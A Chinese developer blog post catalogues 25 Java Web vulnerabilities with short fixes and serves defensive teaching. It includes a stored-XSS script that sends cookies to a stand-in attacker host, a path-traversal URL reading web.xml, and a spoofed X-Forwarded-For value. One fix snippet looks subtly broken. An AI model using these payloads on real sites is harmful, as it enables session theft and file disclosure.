【Java Web 安全】常见安全漏洞及解决方案

最新推荐文章于 2024-06-24 14:19:09 发布
最新推荐文章于 2024-06-24 14:19:09 发布
阅读量1.4w 收藏 56
点赞数 5
分类专栏: 安全 文章标签: JavaWeb 安全 修复
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qqchaozai/article/details/83274743
版权

1 SQL注入

大名鼎鼎,对于Java而言,通过SQL预处理轻松解决。

2 存储型XSS

保存数据时未检测包含js或html代码,照成数据被读取并加载到页面时,会触发执行js或html代码。

样例:

<a id='attacker'>点击就送百元现金</a><br>
<script>
document.getElementById('attacker').href='http://www.attacker_741.com/receiveCookies.html?'+document.cookie;
</script>

解决:

通过过滤器,对请求参数中的Value内容进行遍历,将<>转义为&lt;&gt;

输入过滤,输出转义。

3 文件上传导致文件覆盖

上传文件时,filename存在../../的时候可以跨目录,在任意目录下上传任意文件,包括jsp,zip,exe等

样例:

解决:

检测解压后的文件夹和文件名是否包含../

如果需求可以接受,对所有文件名进行md5加密后存储,也是一个方案。

PS:WinRAR是无法重命名文件名的,需要用7Z,嘿嘿嘿,不谢

4 请求地址伪造

将请求中的X-Forwarded-for设置为127.0.0.1"><input>,后台如果通过该IP源来识别请求IP,将无法真实判断请求源。

解决:

通过request.getRemoteAddr()来获取请求源IP。

5 信息泄漏

请求列表信息和请求单个明细信息,如果包含密码字段,记得返回前添加处理:不返回密码或者密码字段脱密,用***代替。

6 登录限制绕过,验证码不会失效

1、登录的时候,请求重发,验证码不会失效

2、密码错误,会有登录次数限制

但是修改请求头中的X-Forwarded-for,就可以重新计算登录错误次数

解决:

1、登录ip不从X-Forwarded-for获取

2、每次请求后,不管登录成功还是失败,验证码都从session中清空,然后重置

7 全局越权

需要对path,API等都做权限效验,对于无权限效验的API要格外谨慎,特别是文件上传之类的。

8 任意文件读取

样例:https://192.168.23.21/lot/api/?url=%2flogin%2f..%2fWEB-INF%2fweb.xml

攻击者可以直接读取服务器文件,可导致严重敏感信息泄漏。

修复建议:

对url、atn等参数值进行合规检查,不可完全信任前端提交的参数值。过滤敏感路径,且对路径进行拦截。

9 CSRF

跨站请求伪造

修复建议:

后端对CSRF效验TOKEN进行强验证。或对请求来源进行校验,阻止跨域请求。

10 敏感信息泄漏

敏感信息泄漏

通过报错信息可以获取到网站物理路径、数据库结构等敏感信息。

修复建议:

后端屏蔽报错信息。或者对错误信息进行转化。

11 点击劫持风险

响应头未配置X-Frame-Options ,存在点击劫持风险。攻击者可以通过frame内嵌页面,构造页面诱使用户点击造成点击劫持攻击。

修复建议:

根据业务需求合理设置X-Frame-Options值为DENY或SAMEORIGIN或ALLOW-FROM。

12 SSH Weak Algorithms Supported/SSH Server CBC Mode Ciphers Enabled/SSH Weak Key Exchange Algorithms Enabled

Nessus安全扫描漏洞,修复方案:

vi /etc/ssh/sshd_config

在文件末尾添加:

Ciphers aes128-ctr,aes192-ctr,aes256-ctr
MACs hmac-sha1,hmac-ripemd160
KexAlgorithms curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1

重启sshd服务:service sshd restart

13 Apache Tomcat Default Files

使用了tomcat默认配置文件,可能暴露一些敏感信息,如默认404页面会暴露tomcat版本,修复方案:

假设server.xml中Host中配置为:

<Context path="" debug="0" docBase="ROOT" reloadable="true"/>

那我们在ROOT下添加404.html文件:

<!DOCTYPE html>
<html lang="en">
 <head>
  <title>HTTP Status 404 - Not Found</title>
  <style type="text/css">H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}</style>
 </head>
 <body>
  <h1>HTTP Status 404 - Not Found</h1>
  <hr class="line" />
  <p><b>Type</b> Status Report</p>
  <p><b>Message</b> No Solr Page</p>
  <p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p>
  <hr class="line" />
 </body>
</html>

修改web.xml配置,添加:

<error-page>
	<error-code>404</error-code>
	<location>/404.html</location>
</error-page>

最后重启tomcat服务,OK!

14 SSL Self-Signed Certificate

问题:因为使用了自签名的SSL证书

方案:换成权威机构认证后(花钱买)的证书

15 SSL Certificate Cannot Be Trusted

问题:你换了权威机构认证后(花钱买)的证书发现居然还是不可信,常见于软件产品,因为软件会安装在任意环境中,无法绑定域名,无法和证书的CN对应上

方案:

1、扫描器所在主机的hosts配置文件中,添加IP-域名映射,如:192.168.27.X   xxxx.com.cn,xxxx.com.cn需要和证书的CN对应上。

2、在软件所在服务器上修改hostname为xxxx.com.cn

  • vim /etc/sysconfig/network;修改hostname为期望值;
  • vim /etc/hosts;修改或增加主机名对应的IP地址;
  • service network restart;如果无效,则reboot;

16 tomcat 8009

问题:tomcat 8009端口可被攻击者利用,所以如果程序么有必要使用时,建议关闭,百度:Tomcat的8009端口AJP的利用,既可了解利用方式。

修复:修改tomcat*/conf/server.xml配置:注释掉8009开放

<!-- <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" /> -->

17 3306端口外部访问未限制

问题:3306应该仅被可信端进行连接

方案:添加防火墙配置,如果仅本机访问,也可以修改my.cnf:

[mysqld]
bind-address=127.0.0.1

18 逻辑漏洞-升权降权

问题:用户角色修改时,后端没有控制可修改的角色边界,以及可修改的用户边界,比如讲普通用户角色修改为超级管理员,或将超级管理员角色修改为普通用户。

方案:后端添加数据边界控制

19 任意目录修改删除(用户相关)

问题:有些场景下需要在工程下给用户建立私属的文件夹,以用户名命名的文件夹,如果用户名未加控制,可被攻击者利用,比如用户名为../conf,那么就会根据用户名在原目标文件夹的上级创建出conf文件夹,可能会覆盖系统原本的同名文件夹。往往在用户删除时,会同步清理此类文件夹,那么又可能照成系统文件夹的删除。

方案:尽量不采用任何外部接受数据来作为后台命令或文件相关输入;后台对该类数据进行合规检查

20 命令注入

问题:与上一个类似,系统有时候会根据用户输入构建命令,测试人员可以从后台命令列表进行观察,渗透人员则要靠自己猜测

方案:在执行命令拼接前,对用于拼接的各个字符串进行合规检查。

21 HttpOnly

问题:浏览器中通过document.cookie可以获取cookie属性值,攻击者可以利用暗链,XSS,CSRF等手动获取用户cookie,并伪造用户身份执行恶意操作。

测试代码:

<script>alert(document.cookie);</script>

方案:当设置HttpOnly=true,就不能通过脚本获取cookie。一定程度上可以避免cookie被盗用。

修复代码:为所有cookie设置Set-Cookie属性

for(Cookie cookie:httpRequest.getCookies()){
    response.addHeader("Set-Cookie",cookie.getKey()+"="+cookie.getValue()+"; Secure; HttpOnly;");
}

22 mDNS Detection (Remote Network)

问题:mdns (5353)会泄露主机名,端口,操作系统,服务,CPU等信息

解决:关闭5353端口

23 Apache Server ETag Header Information Disclosure

问题:如果用不到Apache,则关闭端口(80)

解决:

lsof -i :80|grep -v "PID"|awk '{print "kill -9",$2}'|sh

24 AMQP Cleartext Authentication

问题:使用了对外的RabbitMQ

解决:如果不使用,则关闭端口5672,或者停止RabbitMQ服务

25 HTTP TRACE / TRACK Methods Allowed

问题:限制TRACE和TRACK访问

解决:

非嵌入Tomcat:修改web.xml

    <security-constraint>  
       <web-resource-collection>  
          <url-pattern>/*</url-pattern>  
          <http-method>PUT</http-method>  
    	  <http-method>DELETE</http-method>  
    	  <http-method>HEAD</http-method>  
    	  <http-method>OPTIONS</http-method>  
    	  <http-method>TRACE</http-method>  
       </web-resource-collection>  
       <auth-constraint>  
       </auth-constraint>  
    </security-constraint>  
    <login-config>  
      <auth-method>BASIC</auth-method>  
    </login-config>

springboot2.0+:添加配置代码

@Bean
public ConfigurableServletWebServerFactory configurableServletWebServerFactory() {
    TomcatServletWebServerFactory factory = new TomcatServletWebServerFactory();
    factory.addContextCustomizers(context -> {
        SecurityConstraint securityConstraint = new SecurityConstraint();
        securityConstraint.setUserConstraint("CONFIDENTIAL");
        SecurityCollection collection = new SecurityCollection();
        collection.addPattern("/*");
        collection.addMethod("HEAD");
        collection.addMethod("PUT");
        collection.addMethod("DELETE");
        collection.addMethod("OPTIONS");
        collection.addMethod("TRACE");
        collection.addMethod("COPY");
        collection.addMethod("SEARCH");
        collection.addMethod("PROPFIND");
        securityConstraint.addCollection(collection);
        context.addConstraint(securityConstraint);
    });
    return factory;
}

爱家人,爱生活,爱设计,爱编程,拥抱精彩人生!

qqchaozai
关注
  • 5
    点赞
  • 56
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
java哪些异常可能导致敏感信息泄露_java开发安全策略_风险漏洞与解决方案
weixin_39844284的博客
03-02 3084
项目语言:java项目环境:JDK1.8Web服务器Nginx+tomcat数据库mysql前端技术bootstrap+layui+jquery+ajax后端技术maven+springboot+shiro+jpa+druid+log4j1、 敏感信息泄露a) 漏洞描述:敏感信息泄露漏洞,是一种通过提交错误请求,使系统出现异常处理并报错,并且将系统程序、配置、路径、类、方法 等敏感信息泄露出来的漏...
常见WEB安全漏洞解决方案
07-27
本资料由IBM Rational Appscan提供,涵盖了常见Web安全漏洞及其解决方案,旨在帮助开发者和安全专家识别并防范这些威胁。以下是其中的一些关键知识点: 1. **SQL注入**:攻击者通过在输入字段中插入恶意SQL代码,...
网站10大常见安全漏洞解决方案
liuhyusb的博客
04-01 825
一般来说牛逼点的地方都会通过安全设备来确保网络环境的安全,所以之前我们也都认为程序员不需要过多的考虑网站安全问题。实际上随着做了几个事业单位的网站之后,也逐渐发现有些方面还是需要程序员注意的。几乎每一个网站后台开发人员都听到的一个词,并且都很敏感,但是不知道是什么原因造成的很多程序员却在实际开发过程中经常忽视这个问题。前段时间部门一位新同事,据说是5年工作经验,在对他的代码做评审时,我们发现所有的DAO层实现都是直接拼接SQL和参数,总监多次提醒他这个问题,但他也没有发现,直到总监说出SQL注入这个词。
常见安全漏洞及其解决方案
资深程序员,曾自学JAVA,C#,如今从业于网安行业
04-11 1055
如果你也想学习:黑客&网络安全的渗透攻防。
【漏洞防范与应对:从发现到修复的全攻略】JAVA JMX agent不安全的配置漏洞【原理扫描】漏洞 ,处理过程详解!!!
最新发布
大唐有趣的小胡.
06-24 519
本文揭露了一个高危漏洞——JAVA JMX agent的不安全配置问题。该问题表现为远程主机上的JMX代理缺乏SSL客户端和密码认证,使得未经认证的攻击者能连接并管理相关Java应用,甚至执行任意代码。此漏洞严重威胁了启用了JMX代理的Java应用的安全性。为解决此问题,文章提出了三项关键措施:首先,必须开启认证机制;其次,应限制可访问JMX服务的IP地址;最后,若JMX服务非核心需求,可考虑直接关闭该功能,以彻底消除安全隐患。
ref:关于JAVA中一些安全漏洞示例说明及如何规避方法代码示例总结分享
蝉之洞
10-22 1734
ref:http://www.xwood.net/_site_domain_/_root/5870/5874/t_c268166.html 标签:安全,漏洞,健壮,java,SQL注入,SS及CSRF,命令注入,线程安全 发布时间:2017-09-16 一、前言 这边通过工作整理一些常见安全漏洞及解决方法,主要涉及有:框架低版本漏洞、空指针的引用、整数溢出、命令注入、SQL注入、XSS及CSRF、跳转漏洞、HTTP Response Splitting漏洞、路径可控制及代码注入、资源泄露...
目标检测之MnasNet
thisiszdy的博客
05-21 1644
一、目标检测之MnasNet MnasNet: Platform-Aware Neural Architecture Search for Mobile 论文链接:https://arxiv.org/abs/1807.11626 论文代码:https://github.com/zeusees/Mnasnet-Pretrained-Model 二、MnasNet 1、一种多目标神经结构搜索方法 ...
2021-08-06 CTFer成长之路-任意文件读取漏洞-文件读取漏洞常见读取路径(Java版)
热门推荐
时光隧道
08-06 5万+
第一步::Java URL组件通过File协议列出目录结构,进而读取文件内容 第二步::File协议使用如下 如:获取C盘某个文件: file:///C:/Users/CLi/AppData/Local/Temp/WindowsLiveWriter1627300719/supfiles52F410/wangdan-se-436963[2].jpg ...
Java代码审计之目录遍历漏洞详解
m0_71745754的博客
01-13 5636
通过用户输入,后端接收到参数直接拼接到指定路径下读取用户的文件名,看似正常,但是用户输入的参数不可控制,黑客将非法的特殊字符作为文件名的一部分,操作到其他路径下,甚至是跳转到服务器敏感目录,读取敏感的配置文件,例如服务器的密码文件,程序数据库,redis等核心配置文件,因此具有一定的风险;
安全开发之Java Web安全编码.pdf
01-07
### 安全开发之Java Web安全编码 #### 一、Web应用安全威胁 在现代互联网环境中,Web应用程序作为企业对外展示的重要窗口,面临着各种各样的安全威胁。这些威胁不仅包括了传统的技术层面的问题,还涉及到了更为...
Java Web应用程序安全技术研究.pdf
04-05
针对这些威胁,文章提出了相应的安全解决方案: 1. 对客户端的防护:加强客户端代码的安全性,例如使用防止XSS攻击的过滤机制,及时更新和修补浏览器以消除已知的安全漏洞,同时对用户输入进行严格的验证和过滤,...
详解.NET Core 使用HttpClient SSL请求出错的解决办法
01-20
问题 使用 HTTP Client 请求 HTTPS 的 API 时出现 The certificate cannot be verified up to a trusted certification authority 异常,并且证书已经传入。 下面就是问题代码: public class Program { public static void Main(string[] args) { var url = @https://xxx.xxx.xxx.xxx:xxxx/xxx-web/services/xxxx?wsdl; var handler = new HttpC
零层套接字-在你的应用程序中放置一个网络堆栈-零层/libzt
01-27
ZeroTier SDK Connect physical devices, virtual devices, and application instances as if everything is on a single LAN. The ZeroTier SDK brings your network into user-space. We've paired our network hypervisor core with a network stack () to provide your application with an exclusive and private virtual network interface. All traffic on this interface is end-to-end encrypted between each peer and w
java开发常见漏洞及处理说明
06-30
本文主要讨论了三个常见安全漏洞:SQL注入、XSS跨站脚本攻击以及文件上传漏洞,以及如何通过过滤和拦截策略来处理这些问题,以确保Java Web程序的安全运行。 首先,SQL注入是一种常见的攻击手段,攻击者通过输入...
Java编写的Web漏洞靶场.zip
01-14
在靶场中,安全从业者可以分享攻防经验,交流最新的安全威胁情报,共同探讨解决方案。这有助于建立更广泛的安全社区,推动整个行业的发展。 总体而言,靶场在信息安全领域具有重要地位,为安全专业人员提供了实战...
任意文件读取与下载漏洞
qwzf
11-14 1万+
前言 上周参加了一个线上赛。有个Web题的WriteUp说是任意文件下载。由于之前没学过,所以就没有想到。现在学习一下 为什么产生任意文件读取与下载漏洞 一些网站的业务需要,可能提供文件查看或下载的功能,如果对用户查看或下载的文件不做限制,就能够查看或下载任意的文件,可以是源文件,敏感文件等等。 任意文件读取漏洞 任意文件读取是属于文件操作漏洞的一种,一般任意文件读取漏洞可以读取配置信息甚至系统重...
隐藏Tomcat异常页面中的版本信息,Tomcat服务器版本号泄露
laterstage的博客
02-20 2486
隐藏Tomcat异常页面中的版本信息,Tomcat服务器版本号泄露
服务器——SSL/TLS协议信息泄露漏洞(CVE-2016-2183)修复办法
xhy1999的博客
11-17 8040
近期某台Windows Server服务器的远程连接端口(3389)被扫出了SSL/TLS协议信息泄露漏洞(CVE-2016-2183),尝试了网上很多复制来复制去的"解决方法",直接导致堡垒机连不上服务器,每次连不上服务器又得去找服务器提供方,真的非常麻烦,在此不得不吐槽一下某些不负责任的复制粘贴,同时,记录下真正的解决方案以供大家参考。
越权漏洞风险及解决方案
Java相关领域
03-22 1万+
常见越权有水平越权、垂直越权和数据越权。
浙江公司Web安全编程规范:Java与PHP应用开发防漏洞详解
它特别关注JAVA和PHP应用开发中的编码安全,针对多种常见威胁如跨站脚本攻击(XSS)、SQL注入、恶意文件执行、不安全的对象引用、跨站请求伪造(CSRF)等提供了详细的解决方案。以下是该规范的核心内容: 1. 规范...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

qqchaozai

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值